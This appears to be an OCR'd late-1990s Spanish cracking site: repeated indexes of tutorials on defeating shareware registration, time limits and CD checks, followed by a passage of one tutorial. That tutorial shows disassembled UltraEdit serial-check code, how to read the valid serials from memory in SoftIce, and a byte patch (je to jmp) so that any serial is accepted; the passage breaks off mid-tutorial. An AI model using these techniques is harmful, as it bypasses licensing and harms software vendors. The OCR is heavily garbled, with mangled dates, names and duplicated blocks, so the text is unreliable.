[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 [Mr.Grey ¡Softlce 3.24 


[AScreens 1.27 (W95) 
¡Conseguir la clave para registrarse. 
[251 10/98 [Mr.Grey ¡Softlce 3.24 


[AxMan 2.21 (W95) 
¡Conseguir la clave para registrarse. 
(25/ 10/98 [Mr.Grey ¡SoftIce 3.24 


[A-X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


Font Look 3.2, Directory Printer 1.8, Super Text Search 1.6 
E ) 


¡Conseguir la clave para registrarse. 
15/8/98 ¡Mr.Brown ¡SoftIce IZ 


[Internet Organizer 3.1 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


[Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Softlce 3,22 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 ¡Mr.Brown ¡SoftIce 2 


[Norton CrashGuard Deluxe 3.0 (W95) 


Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 
Popper” basada en la librería RSAGNT32.DLL 

[Mayo 98 [Estado+Porcino ¡Wdasm 8.X , Softlce 

[Uedit 5.0 (W95) 


¡Conseguir la clave para registrarse. 
[Enero 98 [Estado+Porcino ¡Wdasm 8.X , Softlce 


Shareware: Engañar el registro, Serial, .... 


[Quick Heal v5.20 (W95/W98/NT) 
¡Simular estar registrados. 
113/ 10/99 Kolgado ¡Softlce v4.01 


Toggle Mouse v3.4.3 (W95/W98/NT) 


Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 
25/08/99 Maniac PC W32dasm v8., UltraEdit v6.10a, 
Registry Monitor 


[Registry Studio V1.01 (W95/W98/NT) 
¡Simular estar registrados. 


Softlce v4, W32dasm v8.9, 
20/1059 Barpota a HEX (A tu Gusto ) 
[TogglePopDesk v1.1A (W95) 


¡Simular estar registrados y obtener un número de Serie Válido 
107/09/99 Mr.WhiTe ¡W32dasm v8.93, UltraEdit v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


107/09/99 Mr.WhiTe ¡W32dasm v8.93, UltraEdit v6.10a 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 


| ] de v3.24, W32dasm v8.9, 
15/07/99 Mr.WhiTe UltraEdit v5.0a 
[CdrLabel 4.1 (W95) 


¡Simular estar registrado. 
[15/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[SemPoint 2.25 (W95) 
¡Simular estar registrado. 
113/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Hex WorkShop 2.51 (W95) 
¡Saltarse el registro. 
J ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


[Quick View plus 4.0 (W95) 
¡Saltarse el registro. 
y ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
y ulio 98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[TechFacts 95 (W95) 
¡Simular estar registrado. 
[Diciembre 97  |Estado+Porcino ¡SoftIce 3.0, Editor Hexadecimal 


Shareware: Limitaciones de Tiempo, .... 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 ¡Mr.Grey ¡SoftIce 3.24, Hex Workshop 2.54 


> 
hi 


Shareware: Zen Cracking, .... 
[Ulead Media Studio Pro v5.01 (W95) 


Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

. Softlce v3.25, Referencia 
210959 Estado+Porcino API32 


[Multimedia Builder 3.0 (W95) 
¡Observación de los colores para crackear ;-) 
¡Noviembre 98 [Mr Pink ¡Softlce 


Wen 
[ Plantilla en formato htm | Plantilla en 
formato zip ] 


> 
Wi 
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Indice por Fecha de Publicación 


Octubre 1999 


Registry Studio V1.01 (W95/W98/NT) 


Simular estar registrados. 


Softlce v4, W32dasm v8.9, Heditor 
so 10/99 Karpoff HEX (A tu Gusto ) 
Code Snippet Creator v1.05: (W95/W98/NT) 
Descabezando archivos ejecutables portables 
Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 nuMIT_or [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


La Memoria en W32: Intro (W95/W98/NT) 


Suministrar conocimiento que permita comprender cómo W32 
traduce direcciones virtuales en direcciones físicas. 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 nuMIT_or [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40 (opcional), Softlce 


Reversing with ToPo v1.0 (W95/W98/NT) 


¡Cómo usar ToPo v1.0 


| : Topo v1.0, Uedit y (opcionalmente) 
23/10/99 Mr.Crimson SoftICE 


[Lake Clear Animato v1.0c (W95/W98/NT) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
y 1/10/99 Mr.Green  ¡Softlce v3.24 


[Cuentapasos v3.75 (W95/W98/NT) 
¡Simular estar registrados. 
118/ 10/99 Mr.Blue Softlce v4.0, SmartCheck 6.0, Spy++ 


Productos RKS Software (W95) 


Obtención de un número de Serie Válido y creación de KeyMaker 


| 18/10/99 Mr.Green Softlce v3.24 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Obtener un número de Serie Válido 


: ProcDump v1.5, Gettyp v2.38, 
Ú ae Mr.WhiTe  v32d4asm v8.93, UltraEdit v6.10a 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


17/10/99 Mr.WhiTe 


Quick Heal v5.20 (W95/W98/NT) 


ProcDump v1.50, Gettyp for Dos 
v2.35, Softlce v3.24, W32dasm 
v8.93, UltraEdit v6.10a 


Simular estar registrados. 


| 13/10/99 Kolgado Softlce v4.01 


Wi 


¡Septiembre 1999 


[Ultraedit v6.20b (W95) 
¡Simular estar registrado. 
(29/09/99 “DeeJ ay? ¡SoftIce v3.24, W32dasm v8.9 


[Ulead Media Studio Pro v5.01 (W95) 


Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

. Softlce v3.25, Referencia 
210959 Estados Porcino API32 


[Ulead Video Studio v3.0 (W95) 

Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 

14/09/99 ¡Mr.Orange [WkT!] ¡SoftIce v3.25 


[TogglePopDesk v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 [Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 [Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[ActiveLock 1.5 y VBCodeLibrary 3.0.0 (W95) 
¡Conseguir la clave para registrarse. 


03/09/99 ¡Paco Visual Basic 5+, Smartcheck 6 
(opcional) 


Agosto 1999 


[Ulead Button.Applet 1.0 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(31/08/99 [Mr.Orange ¡SoftIce v3.25, ProcDump 


[Descompresión manual con ProcDump (W95) 
¡Como usar el ProcDump para descomprimir/desencriptar tus cobayas. 
3 1/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


[English-Spanish Interpreter 2000 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 ¡Mr.Crimson ¡SoftIce v3.25, TechFacts 95 


Toggle Mouse v3.4.3 (W95/W98/NT) 


Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 


| 25/08/99 Mania PC o v8.9, UltraEdit v6.10a, Registry 
Monitor 


[Particle Fire screensaver v1.1a (W95) 
¡Conseguir la clave para registrarse. 


. Softlce v4.00, Regmon, Hiew 6.04 
1910899 Champion | (mASM32 opcional) 
[Advanced Video Poker v1.1 (W95) 


[Buscar el número de serie y crear su Key-Generator 
14/08/99 ¡Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


> 
WIN 


¡Julio 1999 


[Ulead PhotolImpact v4.2 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


so 107/99 Mew E v3.25, W32dasm v8.9, UltraEdit 


[Lotus SmartSuite Millenium Edition (W95) 
Conseguir que no caduque el programa y NagScreen. 


1 3/07/99 MrviiTe e v3.25, W32dasm v8.9, UltraEdit 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 
[15/07/99 [Mr.WhiTe ¡Softlce v3.24, W32dasm v8.9, UltraEdit v5.0a 


[WinGest v3.5 (W95/W98/NT) 
¡Obtención de un número de Serie Válido 
[07/07/99 [XASX ¡Softlce v3.25 


J unio 1999 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 


07/06/99 Mr.WhiTe W32Dasm v8.9, Editor 
Hexadecimal 


[Crackeando en VB [Esiel2 r unio de 1999 


Este tutorial contiene lo basico a mi entender que debes saber de 
herramientas y de algunas funciones que tanto le gusta llamar al 
Visual Basic. 


Exploit Submission Wizard 5 (W95) 


¡Conseguir la clave para registrarse. 


10 1/06/99 [Esiel2 ¡Softlce v3.24 | 


¡Mayo 1999 


[Talisman v1.1 (W95) 
¡Conseguir la clave para registrarse. 
11/05/99 [Mr.WhiTe ¡SoftIce 3.24 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque nunca el programa. 


02/05/99 [Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher v 2.4 
(opcional). 


¡Marzo 1999 


[File Compare Utility 3.0.002 (W95) 
[Hacer un Generador de claves (KeyGen). 
101/03/99 ¡Mr.Brown ¡Softlce 3.22, JavaScript 


Win 


[Enero 1999 


[Picture Explorer 1.21 (W95) 
[Conseguir la clave para registrarse. 
(09/01/99 Mr.Grey ¡Wdasm 


[KAWA 3.13 (W95) 
¡Conseguir la clave para registrarse. 
(09/01/99 Mr.Grey ¡Softlce 3.24 


Java Script It ! v1.3 (W95) 


¡Conseguir la clave para registrarse. 
107/01/99 Esiel2 ¡SoftIce v3.24 


[Diciembre 1998 


[Cover Your Tracks 3.1 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 'Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


¡Noviembre 1998 


Uninstall Manager 2.60 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 11/98 Mr.Grey ¡Softlce 3.24 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa. 
(20/ 11/98 Mr.Grey ¡SoftIce 3.24, Hex Workshop 2.54 


[Multimedia Builder 3.0 (W95) 
¡Observación de los colores para crackear ;-) 
¡Noviembre 98 Mr.Pink ¡Softlce 


[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 Mr.Grey ¡SoftIce 3.24 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


¡Octubre 1998 


[Screens 1.27 (W95) 
Conseguir la clave para registrarse. 
[25/ 10/98 [Mr.Grey Softlce 3.24 


[AxMan 2.21 (W95) 
¡Conseguir la clave para registrarse. 
[25/ 10/98 [Mr.Grey Softlce 3.24 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink Softlce, IDA Pro 3.75, Compilador de C 


[A-X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey Softlce 3.24 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey Softlce 3.24 


¡Septiembre 1998 


¡Slim Show 3.1 (W95) 
¡Quitar las limitaciones de la versión Shareware. 
(29/9/98 [Mr.Pink ¡SoftIce 3.22, IDA Pro 3.75, Editor Hexadecimal 


Commandos Behind the Enemy Lines (W95) 


[Evitar el Cd-Check. 
15/9/98 [Mr.Brown ¡Softlce 3.22, IDA Pro 3.75, Editor Hexadecimal 


a. 
WEN 


¡Agosto 1998 


[CdrLabel 4.1 (W95) 
¡Simular estar registrado. 
15/8/98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


¡SemPoint 2.25 (W95) 
¡Simular estar registrado. 
13/8/98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Font Look 3.2, Directory Printer 1.8, Super Text Search 1.6 
E ) 


¡Conseguir la clave para registrarse. 


[5/8/98 [Mr.Brown ¡Softlce 3.22 


¡Julio 1998 


[Internet Organizer 3.1 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


[Hex WorkShop 2.51 (W95) 
¡Saltarse el registro. 
y ulio 98 [Daniel ¡Wdasm, Editor Hexadecimal 


[Quick View plus 4.0 (W95) 
¡Saltarse el registro. 
y ulio 98 [Daniel ¡Wdasm, Editor Hexadecimal 


¡Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡SoftIce 3.22 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
y ulio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
y ulio 98 [Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡SoftIce HL 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
y ulio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
J ulio 98 [Mr.Brown ¡Softice 3.22, Editor Hexadecimal 


WEA 
[Antes de Julio 1998 
[Norton CrashGuard Deluxe 3.0 (W95) 
Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 
Popper" basada en la librería RSAGNT32.DLL 
[Mayo 98 [Estado+Porcino Wdasm 8.X , Softlce 


[Uedit 5.0 (W95) 
¡Conseguir la clave para registrarse. 
[Enero 98 [Estado+Porcino Wdasm 8.X , Softlce 


[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 


. Softlce 3.2, Wdasm 8.X, 
Enero dd año Editor Hexadecimal 
[TechFacts 95 (W95) 
¡Simular estar registrado. 


Diciembre 97 Estado+Porcino pOMleS as Eon 
Hexadecimal 


Wi 
[ Plantilla en formato htm | Plantilla en 
formato zip ] 


> 
Wi 
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[ActiveLock 1.5 y VBCodeLibrary 3.0.0 (W95) 
¡Conseguir la clave para registrarse. 
103/09/99 [Paco ¡Visual Basic 5+, Smartcheck 6 (opcional) 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


[Advanced Video Poker v1.1 (W95) 
Buscar el número de serie y crear su Key-Generator 
14/08/99 [Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


[A.X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


[AxMan 2.21 (W95) 


¡Conseguir la clave para registrarse. 
[25/ 10/98 [Mr.Grey ¡SoftIce 3.24 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
Julio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 Mr.Grey  |Softlce 3.24, Hex Workshop 2.54 


[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 Mr.Grey  |Softlce 3.24 


[CdrLabel 4.1 (W95) 
¡Simular estar registrado. 
[15/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Code Snippet Creator v1.05: (W95/W98/NT) 

Descabezando archivos ejecutables portables 

Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 ¡nuMIT_or ¡W32DA5SM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


Commandos Behind the Enemy Lines (W95) 


Evitar el Cd-Check. 


15/9/98 Mr.Brown Softlce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


Cover Your Tracks 3.1 (W95) 


Conseguir la clave para registrarse. 


(20/ 12/98 Mr.Grey  |Softlce 3.24 


Cuentapasos v3.75 (W95/W98/NT) 


¡Simular estar registrados. 
118/ 10/99 Mr.Blue  |Softlce v4.0, SmartCheck 6.0, Spy++ 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque nunca el programa. 


02/05/99 Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher 
v 2.4 (opcional). 


| D 
[Directory Printer 1.8 (W95) 


¡Conseguir la clave para registrarse. 
[5/8/98 Mr.Brown ¡Softlce 322 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
| 18/10/98 Mr.Grey ¡Softlce 3.24 


| E 
[English-Spanish Interpreter 2000 (W95) 


¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 [Mr.Crimson ¡Softlce v3.25, TechFacts 95 


[Exploit Submission Wizard 5 (W95) 
Conseguir la clave para registrarse. 
101/06/99 [Esiel2 ¡SoftIce v3.24 


| F 
[File Compare Utility 3.0.002 (W95) 


[Hacer un Generador de claves (KeyGen). 
101/03/99 [Mr.Brown ¡Softlce 3.22, JavaScript 


[Font Look 3.2 (W95) 
¡Conseguir la clave para registrarse. 
15/8/98 [Mr Brown ¡Softlce Ed 


| H 
[Hex WorkShop 2.51 (W95) 


¡Saltarse el registro. 
y ulio 98 [Daniel Wdasm, Editor Hexadecimal 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown Softlce 3.22 


| I 
[Internet Organizer 3.1 (W95) 


¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


o 


Java Script It ! v1.3 (W95) 
¡Conseguir la clave para registrarse. 
107/01/99 Esiel2 ¡Softlce v3.24 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


ProcDump v1.50, Gettyp for Dos v2.35, 
17/10/99 ¡Mr.WhiTe ¡Softlce v3.24, W32dasm v8.93, UltraEdit 
v6.10a 


KAWA 3.13 (W95) 


Conseguir la clave para registrarse. 


109/01/99 [Mr.Grey ¡Softlce 3.24 


L 


Lake Clear Animato v1.0c (W95/W98/NT) 


¡Obtención de un número de Serie Válido y creación de KeyMaker 
(21/10/99 [Mr.Green ¡Softlce v3.24 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
Julio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Lotus SmartSuite Millenium Edition (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


15/07/99 [Mr.WhiTe Softlce v3.25, W32dasm v8.9, UltraEdit 
v6.10a 
WEA 


| M 
[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 


Enero 98 o Softlce 32, Wdasm 8.X, Editor 
Hexadecimal 
[Multimedia Builder 3.0 (W95) 


¡Observación de los colores para crackear ;-) 
¡Noviembre 98 |[Mr.Pink ¡Softlce 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 


07/06/99 Mere Me aAenor 
Hexadecimal 

[Norton CrashGuard Deluxe 3.0 (W95) 

Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 

Popper” basada en la librería RSAGNT32.DLL 


[Mayo 98 Estado+Porcino |'Wdasm 8.X , Softlce 


A 


[Particle Fire screensaver v1.la (W95) 
¡Conseguir la clave para registrarse. 


19/08/99 [Champion Softlce v4.00, Regmon, Hiew 6.04 (mASM32 
opcional) 


[Picture Explorer 1.21 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Wdasm 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa. 
(20/ 11/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


| Q 
[Quick Heal v5.20 (W95/W98/NT) 


¡Simular estar registrados. 
| 13/10/99 Kolgado ¡Softlce v4.01 


[QuickView plus 4.0 (W95) 
¡Saltarse el registro. 
J ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


| R 
[Registry Studio V1.01 (W95/W98/NT) 
¡Simular estar registrados. 


Softlce v4, W32dasm v8.9, Heditor HEX (A 
so 10/99 Kamor S Gusto) 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink [Softice, IDA Pro 3.75, Compilador de C 


[Productos RKS Software (W95) 
[Obtención de un número de Serie Válido y creación de KeyMaker 
18/10/99 [Mr.Green ¡Softlce v3.24 


| S 
¡SemPoint 2.25 (W95) 


¡Simular estar registrado. 
13/8/98 ¡Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


¡Slim Show 3.1 (W95) 
¡Quitar las limitaciones de la versión Shareware. 
(29/9/98 [Mr Pink ¡Softlce 3.22, IDA Pro 3.75, Editor Hexadecimal 


[Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 ¡Mr.Brown ¡SoftIce 3,22 


[Super Text Search 1.6 (W95) 
¡Conseguir la clave para registrarse. 
[5/8/98 [Mr.Brown ¡Softlce 3,22 


Toggle Mouse v3.4.3 (W95/W98/NT) 
Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 


| | , a v8.9, UltraEdit 
cd Manto ee v6.10a, Registry Monitor 


[TogglePopDesk v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


07/09/99 Mr.WhiTe W32dasm v8.93, UltraEdit 
v6.10a 


[Talisman v1.1 (W95) 
¡Conseguir la clave para registrarse. 
11/05/99 [Mr.WhiTe ¡Softlce 3.24 


[TechFacts 95 (W95) 
¡Simular estar registrado. 
[Diciembre 97 [Estado+Porcino ¡Softlce 3.0, Editor Hexadecimal 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
Julio 98 [Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


ME 


| U 
[Ulead Button.Applet 1.0 (W95) 


¡Conseguir que no caduque el programa y NagScreen. 
(31/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


[Ulead Media Studio Pro v5.01 (W95) 

Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

(21/09/99 Estado+Porcino ¡Softlce v3.25, Referencia API32 


[Ulead Photolmpact v4.2 (W95) 
[Conseguir que no caduque el programa y NagScreen. 


. Softlce v3.25, W32dasm v8.9, 
2010799 Mr.WhiTe e dit v6.10a 
[Ulead Video Studio v3.0 (W95) 
Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 
14/09/99 Mr.Orange [WkT!] ¡Softlce v3.25 


[Ultraedit v6.20b (W95) 
¡Simular estar registrado. 
(29/09/99 ADeeJay? ¡Softlce v3.24, W32dasm v8.9 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 


. Softlce v3.24, W32dasm v8.9, 
150799 Mr.WhiTe e dit vs .0a 


[Ultraedit 5.0 (W95) 
¡Conseguir la clave para registrarse. 
[Enero 98  ¡Estado+Porcino ¡Wdasm 8.X , Softlce 


[Uninstall Manager 2.60 (W95) 


¡Conseguir la clave para registrarse. 
(20/ 11/98  |¡Mr.Grey ¡SoftIce 3.24 


[Winboost 2000 v1.0.0.1999 (W95/W98/NT) 
¡Obtener un número de Serie Válido 


a ProcDump v1.5, Gettyp v2.38, W32dasm 
Ú Ei MrwarTe dE UltraEdit v6.10a 
[WinGest v3.5 (W95/W98/NT) 


¡Obtención de un número de Serie Válido 
107/07/99 [XASX ¡Softlce v3.25 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
Julio 98 ¡Mr.Brown ¡SoftIce 3.22, Editor Hexadecimal 


| 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 


[AScreens 1.27 (W95) 
¡Conseguir la clave para registrarse. 
[251 10/98 Mr.Grey ¡Softlce 3.24 


[ Plantilla en formato htm | Plantilla en 
formato zip ] 


ME 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Ultraedit v6.10a | W95 / W98 / NT 


Descripción Excelente editor Hexadecimal. 
Tipo Shareware (30 $) 


Url http://www.ultraedit.com 


Protección Nag Screen que nos pide el Numero de Serie. Time Limit 45 Dias 


Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Herramientas Softlce v3.24, W32dasm v8.9, UltraEdit v5.0a 
Objetivo Simular estar registrados. 


Cracker Mr.WhiTe [WkT!] 
Fecha 15 de Julio de 1999 


Introducción 


El programa no tiene limitaciones por no estar registrado, pero aparece una nag- 
screen cada vez que se arranca el programa. Hay una opción para registrarse, 
introduciendo el nombre y la clave. El objetivo será simular que nuestro fake serial 
es un número de serie correcto. 


Al Atake 


Lo primero es ver cómo reacciona el programa al intentar registrarnos. 

Ponemos un nombre, y clave cualquiera, y nos aparece un mensaje que nos dice algo asi "UltraEdit will need to 
be restarted in order to validate the code". 

Total, que salimos del UltraEdit y volvemos a entrar para que nos compruebe el serial. 


Si te fijas, al cerrar el programa, en el directorio donde lo has instalado, se crea un archivo de registro 
uedit32.reg. Este archivo esta encriptado, y contiene precisamente nuestros datos de registro. Si utilizas el 
FileMonitor, podras comprobar como el UltraEdit lee este archivo para comprobar si nos hemos registrado 
correctamente. 


Bien, vamos a utilizar nuestro queridisimo "death listing” o listado muerto y bucear en el código. :0) 


Una vez desensamblado con el W32dasm, guardamos el project file para no tener que desensamblarlo mas 
tarde. Pulsamos el boton de String Data References y empezamos a buscar alguna pista. 
Vemos varias referencias interesantes: 


e Thank you for supporting Shareware 
e UltraEdit 45 Day UltraEdit 45 Day Evaluation time expired!!!! 


Despues de un buen rato investigando el código, y cuando ya empezaba a perderme con tantas posibles 
referencias....... se me ocurrio "cazar" al programa cuando lee ese archivo de registro uedit32.reg. 


Buscando en mi HD encontre esas excelentes paginas de TornOdo, las Cracker's Notes. 


Cojonudo, ahora solo tengo que encontrar la funcion adecuada. Vamos al apartado files a ver que hay....... 
ummm " GetPrivateProfileStringA " coooño, esta me suena. Á ver para que carajo sirve...... 

"Retrieves a string from the specified section in an initialization file" ;0) Comprobamos en el W32Dasm que 
funciones importa el UltraEdit ..... BINGO, está. ¿probamos? PROBAMOS. 


Vamos al Softlce y abrimos el UltraEdit. ARgg, la dichosa Nag que nos pide el serial. Ponemos un nombre y 
un serial cualquiera ( de 6 caracteres ) y.... quietooooo!!!! antes de pulsar el boton , Control+D y vamos al 
Softlce, ponemos un BreakPoint en la funcion " GetPrivateProfileStringA ", (BPX GetPrivateProfileStringA), 
Control+D again. Pulsamos el boton, BANG! PANTALLAZO y de vuelta al Softlce. :0) 


:0040D209 E832A00500 cal1 00467240 ¡Aquí aterriza el Softice 
:0040D20E 59 pop ecx 

:0040D20F 59 pop ecx 

:0040D210 5E pop esi 

:0040D211 85C0 test eax, eax 

:0040D213 7520 jne 0040D235 ¡¿Saltamos a.... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040D213(C) 


:0040D235 8D45C0 lea eax, dword ptr [ebp-40] ¡Serial Real 
:0040D238 50 push eax 

:0040D239 8D4580 lea eax, dword ptr [ebp-80] ¡Nuestro Fake Serial 
:0040D23C 50 push eax 

:0040D23D E8FE9F0500 call 00467240 ¡Compara los Serials 

:0040D242 59 pop ecx 

:0040D243 85C0 test eax, eax 

:0040D245 59 pop ecx 


:0040D246 7426 je 0040D26E ¿HAS PAGADO!!! 

:0040D248 8D8540FFFFEF lea eax, dword ptr [ebp+FFFFFF40] ¿Otro Serial valido 
:0040D24E 50 push eax 

:0040D24F 8D4580 lea eax, dword ptr [ebp-80] ¡Nuestro Fake Serial 
:0040D252 50 push eax 

:0040D253 E8E89F0500 call 00467240 ¡Compara los Serials 

:0040D258 59 pop ecx 

:0040D259 85C0 test eax, eax 

:0040D25B 59 pop ecx 

:0040D25C 7410 je 0040D26E ¿HAS PAGADO!!! 

:0040D25E C70500F24C0001000000 mov dword ptr [004CF200], 00000001 

Es curioso, hay dos numeros de serie validos !!!!, en fin.... No comments ;o) 


:0040D235 8D45C0 lea eax, dword ptr [ebp-40] 

Si aqui escribimos " db ebp-40 " en el softlce veremos el primer serial válido. 
:0040D248 8D8540FFFFFF lea eax, dword ptr [ebp+FFEFFFF40] 

Si aqui escribimos " db ebp+FFFFFF40 " en el softlce veremos el segundo serial válido. 


Vamos a Parchear esto para que nos acepte cualquier serial: 
:0040D246 7426 je 0040D26E 


Lo cambiamos por " :0040D246 EB26 JMP 0040D26E " 
Así siempre saltara al código correcto y se creera que el serial que le hemos puesto lo hemos pagado. ;o) 


Ok, estupendo. Parece que ya esta listo, asi que probamos de nuevo nuestro fake serial y ...... tachan ..... tachan.... nos crea el 
uedit32.reg (tal y como esperabamos), cargamos el UltraEdit otra vez... AAAAAAARGGGG !!!! PERO QUE PASAAAA?? (nos 
ha borrado el uedit32.reg) sera cabronazooo0000!!!. NAAAAG NAAAAG again !! 

